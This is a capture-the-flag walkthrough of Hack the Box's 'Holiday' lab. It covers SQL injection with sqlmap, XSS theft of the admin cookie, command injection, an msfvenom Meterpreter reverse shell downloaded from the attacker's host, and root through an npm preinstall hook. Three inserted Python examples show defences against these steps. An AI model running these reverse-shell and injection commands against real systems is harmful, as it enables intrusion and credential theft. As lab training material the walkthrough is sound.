Hello friends!! Today we are going to solve another CTF challenge, “Holiday”, which is available online for those who want to increase their skill in penetration testing and black box testing. Holiday is a retired vulnerable lab presented by Hack the Box for online penetration testing practice according to your experience level; they have a collection of vulnerable labs as challenges from beginner to expert level.
Level: Expert
Task: find the user.txt and root.txt files on the victim’s machine.
Since these labs are available online, they have static IPs; the IP of the target machine is 10.10.10.25, so let’s begin with nmap port enumeration.
nmap -A -p- 10.10.10.25 --open
From the image given below, you can observe that we found ports 22 and 8000 open on the target system.
As port 8000 is running HTTP, we open the IP address in the browser and find a webpage.
We don’t find anything on the webpage, so we use dirb to enumerate the directories.
dirb http://10.10.10.25:8000
The dirb scan gives us a link to a directory called /login; we open the link and find a login page.
We capture the login request using Burp Suite. We use random credentials as placeholders.
We use sqlmap to check if the login is vulnerable to SQL injection. After finding that it is vulnerable, we use sqlmap to dump the database and find a username “RickA” and a password hash.
sqlmap -r sql.txt --dbms=SQLite -T users --columns --dump --batch
We use hashkiller.co.uk to look up the hash and recover the user’s password.
We log in using these credentials and are redirected to a page that looks like it contains user information.
We click on one of the UUID links and find a page where we can post notes for the users. It also shows that it will take up to 1 minute to post the note.
We try to exploit the note function and find that it is vulnerable to XSS. As the notes are read by the administrator, the XSS can be used to get the admin cookie. To get our payload past the filter we need to use the JavaScript function String.fromCharCode. I created this script here to convert a string to ASCII codes.
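The two defences the note filter described above lacks, shown as an added example (this is not code from the original post or from the Holiday application): a keyword blacklist can be side-stepped by spelling the script with String.fromCharCode, whereas HTML-escaping the note on output and marking the session cookie HttpOnly removes the cookie-theft path no matter what the note contains. The blacklist word list and the sample note are constructed assumptions.

```python
import html
import re

# Assumed blacklist-style note filter: the word list is constructed, not the
# real filter from the Holiday application.
BLACKLIST = re.compile(r"alert|document\.cookie|onerror|onload", re.IGNORECASE)

# Constructed note: the script body is spelled with character codes, so none of
# the blacklisted words appear literally (104,105 decode to the harmless "hi").
OBFUSCATED_NOTE = "<script>String.fromCharCode(104,105)</script>"


def blacklist_allows(note: str) -> bool:
    """Blacklist check: only notes containing a listed word are rejected."""
    return BLACKLIST.search(note) is None


def render_note(note: str) -> str:
    """Output encoding: the note is inserted as text, so '<' can never open a tag."""
    return "<li>" + html.escape(note, quote=True) + "</li>"


def contains_script_tag(rendered_html: str) -> bool:
    """True if the rendered fragment still carries a live <script> element."""
    return "<script" in rendered_html.lower()


def session_cookie_header(name: str, value: str) -> str:
    """Set-Cookie value with HttpOnly: document.cookie cannot read it even if
    an injected script does run in the administrator's browser."""
    return f"{name}={value}; HttpOnly; Secure; SameSite=Lax; Path=/"


if __name__ == "__main__":
    print("blacklist lets the obfuscated note through:", blacklist_allows(OBFUSCATED_NOTE))
    print("escaped render still has a script tag:",
          contains_script_tag(render_note(OBFUSCATED_NOTE)))
    print(session_cookie_header("session", "example-value"))
```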
To post the note and bypass the filter we have to use this payload:
We set up our listener using nc on port 80, as we will receive the response of the page, including the administrator cookie, on this port.
nc -lvp 80
After waiting for 1 minute we receive the admin cookie. The cookie is URL-encoded; we decode it and use it to hijack the administrator session.
We capture the webpage’s request using Burp Suite, replace our cookie with that of the administrator and forward it. As soon as we forward the request, we successfully hijack the administrator session.
We now go to the /admin directory and find a page with options to export bookings and notes.
We capture the request using Burp Suite and check if it is vulnerable to any kind of injection. After enumerating, we find that this page is vulnerable to command injection.
We are unable to get a shell using the web_delivery module of Metasploit because of the filters. Instead we create a payload using msfvenom, upload it to the target machine through the command injection and get a reverse shell.
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=10.10.14.8 lport=4444 -f elf > shell
After creating the shell we start a Python HTTP server to serve it to the target machine.
Now “.” is not blacklisted, so we convert the IP address into a decimal number so that we can bypass the filter.
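Why the decimal form of the address gets past a filter that only recognises dotted quads, and how such a filter should be written instead, as an added example from the defending side (not code from the original post or the Holiday application): the 10.10.14.8 used in the walkthrough is 168431112 in decimal, and a check that canonicalises every inet_aton spelling (decimal, hex, octal and the short a.b and a.b.c forms) before matching catches all of them. The blocked network and the dotted-quad regex are constructed assumptions.

```python
import ipaddress
import re
from typing import Optional

# Constructed assumptions: the range a filter wants to keep out of outbound
# fetches, and the dotted-quad-only pattern the walkthrough's bypass relies on.
BLOCKED_NETS = [ipaddress.ip_network("10.0.0.0/8")]
DOTTED_QUAD = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")


def _parse_part(part: str) -> int:
    """One inet_aton component: 0x.. is hex, a leading 0 is octal, else decimal."""
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part.startswith("0"):
        return int(part, 8)
    return int(part, 10)


def canonicalize_ipv4(host: str) -> Optional[str]:
    """Map any inet_aton spelling (a, a.b, a.b.c or a.b.c.d, each component
    decimal, hex or octal) to its dotted quad; None if host is not one."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    # inet_aton rule: the last component fills all the remaining bytes.
    widths = [8] * (len(values) - 1) + [32 - 8 * (len(values) - 1)]
    addr = 0
    for value, width in zip(values, widths):
        if not 0 <= value < (1 << width):
            return None
        addr = (addr << width) | value
    return str(ipaddress.IPv4Address(addr))


def naive_filter_blocks(host: str) -> bool:
    """Filter that only understands dotted quads: 168431112 walks straight past it."""
    if not DOTTED_QUAD.match(host):
        return False
    try:
        return any(ipaddress.ip_address(host) in net for net in BLOCKED_NETS)
    except ValueError:
        return False


def canonical_filter_blocks(host: str) -> bool:
    """Normalise first, decide second: every spelling of 10.10.14.8 is treated alike."""
    canon = canonicalize_ipv4(host)
    return canon is not None and any(
        ipaddress.ip_address(canon) in net for net in BLOCKED_NETS)
```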
We upload the shell to the target machine using the wget command and save it in the /tmp directory. As soon as we run the command we get a prompt that the shell is uploaded. We give our payload read, write and execute permissions using the command injection.
Now we set up our listener using Metasploit.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.8
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > run
We run the shell using the command injection vulnerability on the target machine. As soon as we run it we get a reverse shell.
We spawn a TTY shell and take a look at the sudoers list, and find that we can run /usr/bin/npm i * as root with no password.
python -c "import pty; pty.spawn('/bin/bash')"
sudo -l
Before trying to get a root shell we first enumerate the rest of the directories and find a file called “user.txt” in the /home/algernon directory. We take a look at the content of the file and find the first flag.
Now, to get root.txt, we go to the /app directory. We rename package.json to pack and symlink /root/root.txt to package.json.
ln -s /root/root.txt package.json
We run /usr/bin/npm i * as the root user and find the final flag.
After searching through Google we find a way to get a reverse shell using a package called rimrafall.
We set up rimrafall by following the instructions given on the webpage. We set up the JSON file and change the preinstall script to a bash one-liner.
We run the command as the root user to get a privileged shell.
sudo npm i rimrafall --unsafe
We set up the listener; as soon as we run the command the preinstall script is executed and we get a reverse shell.
nc -nvlp 1234
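What the sudo rule from the sudo -l step really grants, as an added example from the defending side (not code from the original post or from the rimrafall package): npm runs a package's lifecycle hooks during install, so a NOPASSWD rule for npm i is root command execution through any manifest with a preinstall script. The functions below list the hooks a manifest would trigger, honour ignore-scripts=true from .npmrc (the setting that disables them), and flag such a sudoers line for review; the sample manifest and sudoers line are constructed.

```python
import json
from typing import Dict

# Hooks npm executes on its own while installing a package.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed sample manifest (not the real rimrafall one): the preinstall hook
# is exactly where the walkthrough drops its one-liner.
SAMPLE_MANIFEST = json.dumps({
    "name": "example-pkg",
    "version": "1.0.0",
    "scripts": {
        "preinstall": "echo 'this runs as whoever invoked npm install'",
        "test": "node test.js",
    },
})


def install_time_scripts(manifest_text: str) -> Dict[str, str]:
    """Lifecycle hooks that npm would run while installing this manifest."""
    scripts = json.loads(manifest_text).get("scripts", {})
    return {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}


def scripts_that_would_run(manifest_text: str, npmrc_text: str = "") -> Dict[str, str]:
    """Same, but honouring ignore-scripts=true in .npmrc, which disables all hooks."""
    for line in npmrc_text.splitlines():
        key, _, value = line.partition("=")
        if key.strip() == "ignore-scripts" and value.strip().lower() == "true":
            return {}
    return install_time_scripts(manifest_text)


def sudo_rule_needs_review(sudoers_line: str) -> bool:
    """Flag a NOPASSWD sudoers entry that hands out npm: install hooks run with
    npm's privileges, so the rule is worth as much as a root shell."""
    return "NOPASSWD" in sudoers_line and "npm" in sudoers_line
```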
We go to the /root directory and find a file called root.txt. We take a look at the content of the file and find the final flag.